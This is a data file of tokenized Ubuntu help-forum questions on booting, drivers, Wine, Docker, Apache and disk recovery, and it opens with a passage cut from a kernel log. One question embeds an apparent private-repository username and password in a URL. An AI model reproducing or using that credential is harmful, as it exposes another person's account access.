khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 18.674582 ] usb 3-4 : new full-speed usb device number 5 using xhci_hcd [ 18.692000 ] usb 3-4 : new usb device found , idvendor=0cf3 , idproduct=3121 [ 18.692005 ] usb 3-4 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 95.322810 ] cfg80211 : calling crda to update world regulatory domain [ 95.331089 ] cfg80211 : world regulatory domain updated : [ 95.331096 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 95.331100 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 95.331103 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 95.331106 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 95.331108 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 95.331111 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 112.130948 ] wlan0 : authenticate with 20:0c : c8:8b:26:10 [ 112.155159 ] wlan0 : send auth to 20:0c : c8:8b:26:10 ( try 1/3 ) [ 112.747968 ] wlan0 : authenticated [ 112.750559 ] wlan0 : associate with 20:0c : c8:8b:26:10 ( try 1/3 ) [ 113.161405 ] wlan0 : associate with 20:0c : c8:8b:26:10 ( try 2/3 ) [ 113.923564 ] wlan0 : associate with 20:0c : c8:8b:26:10 ( try 3/3 ) [ 114.166216 ] wlan0 : association with 20:0c : c8:8b:26:10 timed out [ 115.522610 ] wlan0 : authenticate with 20:0c : c8:8b:26:10 [ 115.543234 ] wlan0 : send auth to 20:0c : c8:8b:26:10 ( try 1/3 ) [ 131.424574 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 131.424578 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 131.424581 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 131.424585 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2700 mbm ) [ 131.424589 ] cfg80211 : ( 57240000 khz - 65880000 khz @ 2160000 khz ) , ( n/a , 4000 mbm )
472350	out of date chromium package	latest version of chromium-browser is 34.0.1847.116 but there are some bugs which are fixed in 34.0.1847.137 . there is n't any update since last month . these bugs are public and have cve-2014-1741 , cve-2014-1742 , cve-2014-1740 . wo n't chromium-browser update ?
472351	how to access or recover files from apple hdd with bad s.m.a.r.t . and 05-reallocating sector bad ?	i have a macintosh hd ( hfsplus ) ` [ /dev/sdc2 on /media/ubuntu/macintosh hd type hfsplus ( ro , nosuid , nodev , uhelper=udisks2 ) ] warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . ` `disk /dev/sdc : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000` `device boot start end blocks id system /dev/sdc1 1 1465149167 732574583+ ee gpt partition 1 does not start on physical sector boundary.` ` diagnostic software tells me that the s.m.a.r.t . status is bad and also that the 05-reallocating sector count is bad . i 'm trying to recover some data from it without having to spend $ 600 to ship it to a company that does the manual recover . i do n't care about the disk , it 's still under warranty . i tried to go to mac doctor but they could n't get anything out ( i think they just tried mounted it on a mac and runitf macdrive . ) i 've tried with windows 7 and i managed to mount the drive but some software was not seeing it and the only one who did it was too slow and kind of crappy . i 'm trying now with ubuntu in a bootable flashdrive but i can not open the media because of input/output errors while reading the .journal file . mounting the drive with the system gives this windows message : ` error mounting /dev/sdc2 at /media/ubuntu/macintosh hd : command-line mount -t `` hfsplus '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdc2 '' `` /media/ubuntu/macintosh hd '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdc2 , missing codepage or helper program , or other error.in some cases useful info is found in syslog - try dmesg | tail or so` i 'm addressing this issue with different methods , too long to be listed all , but i ' trying every pieace of information i`m finding so far . i 'd love it if someone could point me in the right direction ; i have some fundamental knowledge on computers but i 'm not a developer , and recently got into ubuntu just as one alternative .
472352	window glitches and lagging problems in ubuntu 14.04	i 'm currently using ubuntu 14.04 for some development needs and i often encounter with lagging issues and glitches as shown below : ( see in the titlebar and icons and in the eclipse in the background ) i 've no idea what it 's all about . can you suggest me what can i do ?
472354	run libreoffice 4 headless at startup	i used http : //www.openvpms.org/documentation/install-openoffice-headless-service-ubuntu for run openoffice and libreoffice 3 at ubuntu start up but due to some pid change it dont work for liberoffice4 anybody know how can i run libreoffice 4 at startup ! ? update 1 : as its mentioned in the link i mean libreoffice - headless in ubuntu server so it dont have any ui .
472356	what are possible damages can harm a computer after forced turning off ( pressing the power button ) ?	for sure a lot of us has experienced a freeze situation for some reason , and we do n't have any other solution but to turn off our pc manually ( maybe for lack of experience ) , so : is it harmful to the computer ? is there an another solution otherwise turning off the computer manually ?
472357	unable to configure wifi ad-hoc network in ubuntu 14.04	was trying to set a wifi ad-hoc in ubuntu 14.04 , added the following lines in /etc/network/interface file auto wlan0 iface wlan0 inet static address 10.30.11.100 netmask 255.255.252.0 wireless-mode ad-hoc wireless-essid ubuntutest wireless-key 12345678 wireless-channel 3 broadcast 10.30.12.255 gateway 10.30.10.118 ///my ethernet ip my ifconfig wlan0 output wlan0 link encap : ethernet hwaddr f4:6d:04:8b:90:0f inet addr:10.30.11.100 bcast:10.30.12.255 mask:255.255.252.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0 mb ) tx bytes:0 ( 0 kb ) im am not getting an ipv6 id and `` running multicast is also missing '' . so when i remove the ethernet connection , my wifi also becomes unavailable . what should be done to keep the wifi ad-hoc intact .
472359	alternative to shotwell	i have a nikon camera and a doro phone . on my windows 7 pc i am able to download photos from both using piccassa with no problems . on my linux laptop running ubuntu 12.04 i can download photos from my camera with no problems . however shotwell does not recognise my doro phone and no icon appears when i connect it . i understand piccasa no longer supports linux and i can not download it . is there an alternative to shotwell or am i doing something wrong
472362	how can i resize a partition without moving it using partition manager ( gparted does n't work with kde ) ?	i want to resize the current kubuntu partition , but kde partition manager apparently only offers the resize-and-move option . i 'm afraid the next boot will fail if i move that partition , correct ? i ca n't use gparted . thank you .
472363	personal web blank on ubuntu 14.04	my personal web showing a blank white screen in ubuntu 14:04 with apache 2.4.7 . i have put the web files in / var / www / html . phpinfo phpmyadmin and run well . please note the personal web runs fine on ubuntu 12:04 .
472368	aegis padlock 256 bit padlock reset and now what ?	okay here is how it works : the external drive has a numeric keylock on it to open it . top level admin user levels 5 ( 5 partitions ) each user has his own password and admin can delete user , change password , but theres no crossing over of data . once a specific password has been typed in on the external drive it identifies the user and only boots their partition - which may have various partitions within . anyway . i forgot the admin password and now am i left with a defunct external drive without the admin rights ? or is there something out there that can manage all this ? what would the actual set up look like drive wise with admin , swaps , encryption etc ? i am a newbie at this but one of you bright sparks will probably know how to do this or that there is a program for this ! thanks in advance
472369	unable to boot ubuntu from a dual boot with windows 8.1	just finished installing ( dual boot ) ubuntu on my second partition , the first one containing windows 8.1 , the installation went on smoothly until the end.but now the problem is that when i power on my computer there is no option to boot into ubuntu and windows 8.1 just loads normally..is there something wrong..and can anyone help ... thanks in advance .
472375	i have made an entry for the server alias in my .conf file in '/etc/apache2/example.com.conf ' but still it does n't work with www in the browser	my example.com directory is in /var/www/html/example.com and i am running it on localhost . the example.com.conf file is as follows : < virtualhost *:80 > serveradmin admin @ example.com servername example.com serveralias www.example.com documentroot /var/www/html/example.com errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost > i made an entry in the hosts file as follows : 127.0.0.1 example.com i can access the website in the browser using example.com but when i try to access www.example.com it says could not connect . how do i fix this ?
472378	how to compile classicsudoku ?	i 've just downloaded a game from http : //sourceforge.net/projects/classicsudoku/ ? source=directory i do n't know how to compile it , because there is no configure file . and autogen.sh command shows `` autogen.sh : command not found '' .
472379	xrdp with sound redirection ubuntu 12.04	how can i install xrdp with sound redirection to client on ubuntu 12.04 ? after clear ubuntu and xrdp installation i can connect to xrdp but i have no i 've tried script for compiling xrdp from sources : http : //scarygliders.net/2013/07/25/x11rdp-o-matic-version-3-now-released/ but it does n't work for latest version ( master ) , session is closing after start : [ 20140527-15:18:31 ] [ info ] a connection received from : 10.0.0.8 port 60456 [ 20140527-15:18:31 ] [ info ] an established connection closed to endpoint : 10.0.0.8:60456 - socket : 8 [ 20140527-15:18:31 ] [ info ] an established connection closed to endpoint : null : null - socket : 7 [ 20140527-15:18:32 ] [ info ] an established connection closed to endpoint : 10.0.0.8:60456 - socket : 8
472380	compile php by source . stuck at phar.phar	i am trying to install php ( version - 5.5.11 ) by source since i need php installation with enable-debug and enable-maintainer-zts options . downloaded the package ./configure -- enable-maintainer-zts -- enable-debug -- with-apxs2=/usr/local/apache2/bin/apxs -- with-mysql and when i do make , the steps are all fine until i reach `` generating phar.phar '' where the make seems to be stuck on inspecting ( with make -n ) the steps to be run are , echo `` generating phar.phar '' rm -f ext/phar/phar.phar rm -f /usr/local/php_5.5.11_installation/php-5.5.11/ext/phar/phar.phar ` if test -x `` /usr/local/php_5.5.11_installation/php-5.5.11/sapi/cli/php '' ; then /usr/local/php_5.5.11_installation/php-5.5.11/build/shtool echo -n -- `` /usr/local/php_5.5.11_installation/php-5.5.11/sapi/cli/php -n '' ; if test `` x '' ! = `` x '' ; then /usr/local/php_5.5.11_installation/php-5.5.11/build/shtool echo -n -- `` -d extension_dir=/usr/local/php_5.5.11_installation/php-5.5.11/modules '' ; for i in bz2 zlib phar ; do if test -f `` /usr/local/php_5.5.11_installation/php-5.5.11/modules/ $ i.la '' ; then . /usr/local/php_5.5.11_installation/php-5.5.11/modules/ $ i.la ; /usr/local/php_5.5.11_installation/php-5.5.11/build/shtool echo -n -- `` -d extension= $ dlname '' ; fi ; done ; fi ; else /usr/local/php_5.5.11_installation/php-5.5.11/build/shtool echo -n -- `` /usr/local/php_5.5.11_installation/php-5.5.11/sapi/cli/php '' ; fi ; ` -d 'open_basedir= ' -d 'output_buffering=0 ' -d 'memory_limit=-1 ' -d phar.readonly=0 -d 'safe_mode=0 ' ext/phar/phar.php pack -f ext/phar/phar.phar -a pharcommand -c auto -x \\.svn -p 0 -s /usr/local/php_5.5.11_installation/php-5.5.11/ext/phar/phar/phar.php -h sha1 -b `` `/usr/local/php_5.5.11_installation/php-5.5.11/build/shtool echo -n -- `` /usr/local/bin/php '' ; ` '' /usr/local/php_5.5.11_installation/php-5.5.11/ext/phar/phar/ chmod +x ext/phar/phar.phar echo echo `` build complete . '' echo `` do n't forget to run 'make test ' . '' echo i ran the command manually and in ps aux i see , /usr/local/php_5.5.11_installation/php-5.5.11/sapi/cli/php -n -d open_basedir= -d output_buffering=0 -d memory_limit=-1 -d phar.readonly=0 -d safe_mode=0 ext/phar/phar.php pack -f ext/phar/phar.phar -a pharcommand -c auto -x \.svn -p 0 -s /usr/local/php_5.5.11_installation/php-5.5.11/ext/phar/phar/phar.php -h sha1 -b /usr/local/bin/php /usr/local/php_5.5.11_installation/php-5.5.11/ext/phar/phar/ and another command invoked by this command , sh -c cd '/usr/local/php_5.5.11_installation/php-5.5.11 ' ; pear -q info php_archive 2 > /dev/null|grep 'api version' from what i see , pear is a directory in the php folder . so what is happening here ? why are arguments being passed to it ? have i missed some step ? do i need to install pear or something ?
472383	how to query software packages that i installed today ?	how to query software packages that i installed today or yestoday ?
472385	installation with nvidia	since ubuntu 13.04 i have been experiencing installation problems . earlier versions used to install and work right out of the box . the symptoms are i run a live cd and boot into a desktop without access to my keyboard or mouse . i am currently trying to install lubuntu with the same issues . my hardware is intel i7 quad core with nvida gtx gforce 1 gig . i read somewhere that i have to go into compatibility mode by pressing f4 on boot . i have tried that which allowes me access to mouse & keyboard . i then install the recommended drivers . but on reboot i am back to a desktop which but no keyboard or mouse . i am surprised no one has run into this problem already . i look forward to a solution . regards s
472388	how to change the repository location while installing from live cd ?	i am installing 14.04 from a live cd . while installing , it downloads updates from the internet . i see it is currently downloading from http : //in.archive.ubuntu.com/ is there any way i can change that repo ? my company has ubuntu mirrored on an internal repository , and i would like to use that . i tried changing in /etc/apt/sources.lst , but the installer does n't respect that file .
472390	what winbox alternatives are available for 12.04	winbox is an application which is use to remotely access a mikrotik board . i 'm using ubuntu 12.04 and i need an urgent alternative to that software . any suggestion would be appreciated , but ideally would be referred .
472396	network connection	i have a rather fascinating problem and hoping some one could shed the light on it . i have ubuntu 12.4 lts server with 2 nic 's : 1 . 10/100 2 . 10/100/1000 . eth0 & eth1 respectfully . i used the eth1 ( 10/100/1000 ) nic and manually gave an ip address ( 192.168.2.50 ) and the server was working fine . afterwords i updated the server to ubuntu desktop via the command line ; the network worked fine . few months ago i took down the server for maintenance in the house and couple of days back i re-connected the server back , but now it does not connect to the lan with the static ip address i 've given . but when i changed the eth1 nic to dhcp it worked . but given it is a server i can not have it in dynamic . here is what have tried so far : i have flushed the ip address a few times . i have reset the ip address again a few times , but every time i give a static address and it does not connect to the lan , nor the internet .
472398	alter default command-line flags of chrome in gnome shell	where are default command-line flags for google chrome set ? when i start google chrome and take a look at the process via ps axu i can see lots of command-line flags . i can not find them in /usr/share/applications/google-chrome.desktop . in my case , i want to remove -- disable-seccomp-filter-sandbox since google chrome is showing me the following warning . you are using an unsupported command-line flag -- disable-seccomp-filter-sandbox
472402	is there an kernel version list available somewhere ?	so , for dev needs , i need to find all available kernel versions for given ubuntu version , for example , lucid lynx server . in short , something similar to this novell wiki for sles : http : //wiki.novell.com/index.php/kernel_versions so , is there something like this , but for ubuntu ? my google searches found absolutely nothing . : (
472406	how to get more info while installing an application ?	suppose i want to install an application named aeiou . if i go to software center and look for the application , it gives information about the application and also shows some of the optional plugins that i can install . is there a way we can access these using commandline ? there seems to be no information regarding this on man page of apt-get .
472410	ubuntu set up not functioning	i have downloaded ubuntu onto a stick drive and ran the installion , which seemed to work . on rebooting i get a grub rescue message but ubuntu does not boot . windows does not boot at all and resetting the bios from usb to the internal hard drive does not do anything either . i have reset the bios to run from the usb and ubuntu tries to re-install , saying there are no operating systems installed . stage 4 of the installation manual for ubuntu shows a screen with the option to partition the hardrive and load alongside the exisitng windows set up . this does not appear and i just get the option to load ubuntu as there is no other opertating system or to `` do something else '' which requires selection of something that makes no sense to me . i am not computer savvy at all , but it seems to me , that i lost windows 7 and that ubuntu is unable to install successfully . at least at the moment , i can not use my computer at all . also , the ubuntu installation asks questions that do not seem to be covered in the installation guide . any help here would be greatly appreciated .
472411	'ssh -x -a -oclearallforwardings=yes ' running on my machine	i have a process with the following name : ssh -x -a -oclearallforwardings=yes -2 user @ host -s sftp running on my machine , not for the first time , and i do n't remember running such ( i have obscured the names user and host , but other than that the command is the same ) . under that , i have ssh user @ host running , which i remember calling , and under that the following : /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session gnome-session -- session=ubuntu-2d i have tried to kill these , without root permissions , but both with sigkill and with sighup , with no luck . do you have any idea what could it be ?
472412	how do i upgrade docker	i type docker.io version , and get : client version : 0.9.1 go version ( client ) : go1.2.1 git commit ( client ) : 3600720 server version : 0.9.1 git commit ( server ) : 3600720 go version ( server ) : go1.2.1 last stable version : 0.11.1 , please update docker i follow that with an apt-get update , then either : apt-get upgrade , or apt-get upgrade docker.io , but all it gives me is : docker.io is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i 'm running ubuntu 14.04 ( trusty ) 64bit server . edit : i think i used a script in this post comment to install docker ( since it purported to allow me to just type docker instead of docker.io )
472414	which is the best ubuntu version for my laptop dell inspiron 3521	following is my laptop configuration model : dell inspiron 3521 processor : i3 third generation ram : 4 gb hard disk : 500gb graphics cards : intel graphics media accelerator 4000 hd , ati readon hd 87xx series . i tried installing ubuntu 13.10 , every thing works fine except my hybrid ati graphics card.and when i installed 12.04 lts nothing was working ( wifi , ethernet , sound etc ) . so please tell me which ubuntu will be best for my laptop ... .
472416	can i 'reset ' an ssd to improve its performance ?	i think my ssd is getting a bit slower with time . i think it just might be the case , if trim is not supported by my version of ubuntu . i have an intel 520 ssd in a thinkpad laptop . i am using ubuntu 13.10 32-bit and i 'm going to do a fresh install of 14.04 lts 64-bit . while doing a reinstall , could i somehow 'reset ' an ssd to its pristine state , thus restoring its performance ?
472417	error while install libc6 : amd64	when i run this command '' sudo apt-get install libc6 '' i got an error i.e. , libc6 : amd64 can not be configured because libc6 : i386 is in a different version
472430	what does `` system program detected error '' mean and how serious is it ?	i am running ubuntu 32-bit using vmware player on windows 7 64-bit . i logged in to my ubuntu account and did my normal activities ( check for updates , browse askubuntu , etc . ) but when i checked for updates it said it had errors authenticating because of which i restarted and downloaded chromium browser , opened it and synced my apps . but when the extensions synced the launcher ( unity ) crashed , so i sent the ctrl+alt+del signal which did n't work . i opened dash and typed 'shut down ' and my host crashed and i hard-rebooted . the computer restarted a few times and when i logged on to my ubuntu account i was welcomed the following screen : the mouse did not seem to work so i right clicked the buttons and pressed enter . when i reported the second one i received an internal error . so i signed out and signed back in . everything worked fine from then . how do i verify everything is alright ? i 'm running directly from the iso rather than burning it .
472431	how to read disc with xfs system on ubuntu ?	i have disk from nsa210 , partition sdb2 is xfs , i put it into my pc , i can see partition xfs , but i ca n't read any data , is there any way to read data from this disk on ubuntu 14.04 ?
472433	nvidia problem when installing wine	i have a system that has optimus nvidia card , so when i try to install wine it says . the following packages will be removed : nvidia-libopencl1-331-updates i have tried wine1.6 & wine1.7 same they will remove it nvidia-libopencl1-331-updates and i will not be able to use optimus . is there any work around to install wine ? one @ ubuntu : ~ $ sudo apt-get install wine1.7 reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libavdevice53 libavfilter3 libswresample0 smplayer-translations use 'apt-get autoremove ' to remove them . the following extra packages will be installed : binfmt-support fonts-horai-umefont fonts-unfonts-core fonts-wqy-microhei gnome-exe-thumbnailer icoutils libasn1-8-heimdal : i386 libcapi20-3 libcapi20-3 : i386 libdb5.3 : i386 libexif12 : i386 libgd3 : i386 libgif4 : i386 libglu1-mesa : i386 libgphoto2-6 : i386 libgphoto2-port10 : i386 libgpm2 : i386 libgssapi3-heimdal : i386 libgstreamer-plugins-base0.10-0 : i386 libgstreamer0.10-0 : i386 libhcrypto4-heimdal : i386 libheimbase1-heimdal : i386 libheimntlm0-heimdal : i386 libhx509-5-heimdal : i386 libieee1284-3 : i386 libkrb5-26-heimdal : i386 liblcms2-2 : i386 libldap-2.4-2 : i386 libltdl7 : i386 libmpg123-0 : i386 libncurses5 : i386 libodbc1 libopenal1 : i386 libosmesa6 libosmesa6 : i386 libroken18-heimdal : i386 libsane : i386 libsasl2-2 : i386 libsasl2-modules : i386 libsasl2-modules-db : i386 libusb-1.0-0 : i386 libv4l-0 : i386 libv4lconvert0 : i386 libvpx1 : i386 libwind0-heimdal : i386 libxpm4 : i386 ocl-icd-libopencl1 ocl-icd-libopencl1 : i386 odbcinst odbcinst1debian2 p11-kit-modules : i386 p7zip ttf-wqy-microhei unixodbc wine-gecko2.24 wine-gecko2.24 : i386 wine-mono4.5.2 wine1.7-amd64 wine1.7-i386 : i386 winetricks suggested packages : libterm-readline-gnu-perl libterm-readline-perl-perl isdnutils-doc isdnutils-doc : i386 libgd-tools : i386 gphoto2 : i386 gtkam : i386 gpm : i386 libvisual-0.4-plugins : i386 gstreamer-codec-install : i386 gnome-codec-install : i386 gstreamer0.10-tools : i386 gstreamer0.10-plugins-base : i386 liblcms2-utils : i386 libmyodbc odbc-postgresql tdsodbc unixodbc-bin libportaudio2 : i386 libroar-compat2 : i386 hplip : i386 hpoj : i386 libsane-extras : i386 libsasl2-modules-otp : i386 libsasl2-modules-ldap : i386 libsasl2-modules-sql : i386 libsasl2-modules-gssapi-mit : i386 libsasl2-modules-gssapi-heimdal : i386 opencl-icd : i386 p7zip-full dosbox : any winbind recommended packages : wine1.5-amd64 wine1.5-i386 : i386 unixodbc : i386 wine-mono4.5.2 : i386 wine the following packages will be removed : nvidia-libopencl1-331-updates the following new packages will be installed : binfmt-support fonts-horai-umefont fonts-unfonts-core fonts-wqy-microhei gnome-exe-thumbnailer icoutils libasn1-8-heimdal : i386 libcapi20-3 libcapi20-3 : i386 libdb5.3 : i386 libexif12 : i386 libgd3 : i386 libgif4 : i386 libglu1-mesa : i386 libgphoto2-6 : i386 libgphoto2-port10 : i386 libgpm2 : i386 libgssapi3-heimdal : i386 libgstreamer-plugins-base0.10-0 : i386 libgstreamer0.10-0 : i386 libhcrypto4-heimdal : i386 libheimbase1-heimdal : i386 libheimntlm0-heimdal : i386 libhx509-5-heimdal : i386 libieee1284-3 : i386 libkrb5-26-heimdal : i386 liblcms2-2 : i386 libldap-2.4-2 : i386 libltdl7 : i386 libmpg123-0 : i386 libncurses5 : i386 libodbc1 libopenal1 : i386 libosmesa6 libosmesa6 : i386 libroken18-heimdal : i386 libsane : i386 libsasl2-2 : i386 libsasl2-modules : i386 libsasl2-modules-db : i386 libusb-1.0-0 : i386 libv4l-0 : i386 libv4lconvert0 : i386 libvpx1 : i386 libwind0-heimdal : i386 libxpm4 : i386 ocl-icd-libopencl1 ocl-icd-libopencl1 : i386 odbcinst odbcinst1debian2 p11-kit-modules : i386 p7zip ttf-wqy-microhei unixodbc wine-gecko2.24 wine-gecko2.24 : i386 wine-mono4.5.2 wine1.7 wine1.7-amd64 wine1.7-i386 : i386 winetricks 0 upgraded , 61 newly installed , 1 to remove and 0 not upgraded . need to get 166 mb of archives . after this operation , 537 mb of additional disk space will be used . do you want to continue ? [ y/n ] aptitude suggested by @ yuriy nazarenko sudo aptitude install wine1.7 the following new packages will be installed : binfmt-support { a } fonts-horai-umefont { a } fonts-unfonts-core { a } fonts-wqy-microhei { a } gnome-exe-thumbnailer { a } icoutils { a } libasn1-8-heimdal : i386 { a } libcapi20-3 { a } libcapi20-3 : i386 { a } libdb5.3 : i386 { a } libexif12 : i386 { a } libgd3 : i386 { a } libgif4 : i386 { a } libglu1-mesa : i386 { a } libgphoto2-6 : i386 { a } libgphoto2-port10 : i386 { a } libgpm2 : i386 { a } libgssapi3-heimdal : i386 { a } libgstreamer-plugins-base0.10-0 : i386 { a } libgstreamer0.10-0 : i386 { a } libhcrypto4-heimdal : i386 { a } libheimbase1-heimdal : i386 { a } libheimntlm0-heimdal : i386 { a } libhx509-5-heimdal : i386 { a } libieee1284-3 : i386 { a } libkrb5-26-heimdal : i386 { a } liblcms2-2 : i386 { a } libldap-2.4-2 : i386 { a } libltdl7 : i386 { a } libmpg123-0 : i386 { a } libncurses5 : i386 { a } libodbc1 { a } libopenal1 : i386 { a } libosmesa6 { a } libosmesa6 : i386 { a } libroken18-heimdal : i386 { a } libsane : i386 { a } libsasl2-2 : i386 { a } libsasl2-modules : i386 { a } libsasl2-modules-db : i386 { a } libusb-1.0-0 : i386 { a } libv4l-0 : i386 { a } libv4lconvert0 : i386 { a } libvpx1 : i386 { a } libwind0-heimdal : i386 { a } libxpm4 : i386 { a } ocl-icd-libopencl1 { ab } ocl-icd-libopencl1 : i386 { ab } odbcinst { a } odbcinst1debian2 { a } p11-kit-modules : i386 { a } p7zip { a } ttf-wqy-microhei { a } unixodbc { a } wine-gecko2.24 { a } wine-gecko2.24 : i386 { a } wine-mono4.5.2 { a } wine1.7 wine1.7-amd64 { a } wine1.7-i386 : i386 { a } winetricks { a } 0 packages upgraded , 61 newly installed , 0 to remove and 0 not upgraded . need to get 166 mb of archives . after unpacking 537 mb will be used . the following packages have unmet dependencies : nvidia-libopencl1-331-updates : conflicts : libopencl1 which is a virtual package . conflicts : libopencl1 : i386 which is a virtual package . ocl-icd-libopencl1 : conflicts : libopencl1 which is a virtual package . ocl-icd-libopencl1 : i386 : conflicts : libopencl1 which is a virtual package . the following actions will resolve these dependencies : remove the following packages : 1 ) nvidia-libopencl1-331-updates leave the following dependencies unresolved : 2 ) nvidia-331-updates recommends nvidia-libopencl1-331-updates accept this solution ? [ y/n/q/ ? ]
472434	'xojo ' is the only application that i ca n't install	i ca n't install xojo . when i click install in the software center it 's not progressing . in the terminal it 's stuck in : gichan02 @ gichan02-latitude-d520 : ~ $ sudo apt-get install xojo [ sudo ] password for gichan02 : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : xojo-bin the following new packages will be installed : xojo xojo-bin 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 209 mb/209 mb of archives . after this operation , 596 mb of additional disk space will be used . do you want to continue ? [ y/n ] y 0 % [ working ] then after waiting for an hour for progress it says : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/xojo/ubuntu/pool/main/x/xojo/xojo-bin_2013.41-0ubuntu1_i386.deb could not resolve host : private-ppa.launchpad.net so i added apt repository for 'private-ppa ' : deb https : //ging-giana : d69gwg16zqkz2rkb4c0q @ private-ppa.launchpad.net/commercial-ppa-uploaders/xojo/ubuntu trusty main then when i try 'apt-get update ' : gpg error : https : //private-ppa.launchpad.net trusty release : the following signatures were invalid : nodata 2 then i noticed something the software sources : other software tab : added by software-center ; credentials stored in /etc/apt/auth.conf https : //private-ppa.launchpad.net/commercial-ppa-uploaders/xojo/ubuntu so i go to the '/etc/apt/auth.conf ' , but it can not be opened and it is not a keyserver . so i uncheck : added by software-center ; credentials stored in /etc/apt/auth.conf https : //private-ppa.launchpad.net/commercial-ppa-uploaders/xojo/ubuntu gpg error was gone . but then again i found myself at the beginning of the problem.stuck at '0 % [ working ] ' . 'xojo ' is the only application that i ca n't install.any explanation why is it like that ?
472435	skype mini video display similar to windows on minimizing	in windows skype has a feature that when you minimize it while you on a video call , you get a mini video display of the other person . but on ubuntu i do n't have this feature . is there an option or a tweak to enable such feature ?
472437	ubuntu server 12.04.4 lts boot stucks	i have an ubuntu server 12.04.4 server running on dell r720 server with dual processor and 32gb ram . when booting , it gets stuck but i am able to ssh to the server . i have installed ubuntu with lvm . i also get dm-0 : write same failed . manually zeroing error . here is the boot.log $ cat boot.log fsck from util-linux 2.20.1 fsck from util-linux 2.20.1 /dev/sda2 was not cleanly unmounted , check forced . /dev/mapper/ahrims -- vg-root : clean , 94798/241950720 files , 15777513/967784448 blocks mount : according to mtab , tmpfs is already mounted on /dev/shm mountall : mount /dev/shm [ 638 ] terminated with status 1 /dev/sda2 : 227/62496 files ( 0.9 % non-contiguous ) , 39849/249856 blocks mountall : fsck /boot [ 580 ] terminated with status 1 * starting configure network device security [ ok ] * starting configure network device security [ ok ] * starting configure network device security [ ok ] * starting configure network device security [ ok ] * starting configure network device security [ ok ] * starting mount network filesystems [ ok ] * starting failsafe boot delay [ ok ] * starting configure network device [ ok ] * starting configure network device [ ok ] * stopping mount network filesystems [ ok ] * starting bridge socket events into upstart [ ok ] * starting configure network device [ ok ] * stopping cold plug devices [ ok ] * stopping log initial device creation [ ok ] * starting load fallback graphics devices [ ok ] * starting configure network device security [ ok ] * starting save udev log and update rules [ ok ] * stopping save udev log and update rules [ ok ] * starting configure virtual network devices [ ok ] * stopping configure virtual network devices [ ok ] * starting load fallback graphics devices [ fail ] * starting userspace bootsplash [ ok ] * starting send an event to indicate plymouth is up [ ok ] * stopping send an event to indicate plymouth is up [ ok ] * stopping userspace bootsplash [ ok ] * starting uncomplicated firewall [ ok ] * starting configure network device [ ok ] * stopping openssh server [ ok ] * starting openssh server [ ok ] * starting mount network filesystems [ ok ] * stopping mount network filesystems [ ok ] * stopping failsafe boot delay [ ok ] * starting system v initialisation compatibility [ ok ] * starting set sysctls from /etc/sysctl.conf [ ok ] * starting configure network device [ ok ] * stopping set sysctls from /etc/sysctl.conf [ ok ] skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles [ ok ] * stopping system v initialisation compatibility [ ok ] * starting system v runlevel compatibility [ ok ] * starting save kernel messages [ ok ] * starting acpi daemon [ ok ] * starting automatic crash report generation [ ok ] * starting regular background program processing daemon [ ok ] * starting deferred execution scheduler [ ok ] * starting cpu interrupts balancing daemon [ ok ] * stopping save kernel messages [ ok ] * starting crash report submission daemon [ ok ] * starting postgresql 9.1 database server [ ok ] * starting denyhosts denyhosts [ ok ] starting customer-service : custom-service .
472441	booting ubuntu 14.04 via usb says `` invalid image '' for some reason	i 'm trying to boot ubuntu on my laptop because apparently all windows updates break samsung laptops or something . anyhow , i took out the hard-drive because it was putting it into a boot loop and preventing me accessing bios . i downloaded the current desktop iso file of ubuntu 14.04 ( 64 bit ) , burned it into a disk , the disk did nothing except making noise . now i 'm trying a usb and it boots to grub command line and i do n't know my way around this ; so i typed help and not being able to scroll up i picked the closest command `` normal '' and then selected not to install but run , this then tells me : invalid image error : premature end of file /capser/vmlinuz.efi . sorry if this is not the best question to ask , but where do i go from here ? i 'm aiming to get to desktop , so i can plug in my hdd without it going into a boot loop and format it , install ubuntu and from then on , just use ubuntu or pirate a different version of windows that might not brick the thing ( last time this happened was during an update to windows 8.1 , i had to send it back to samsung , who had to replace the frickin ' motherboard ) .
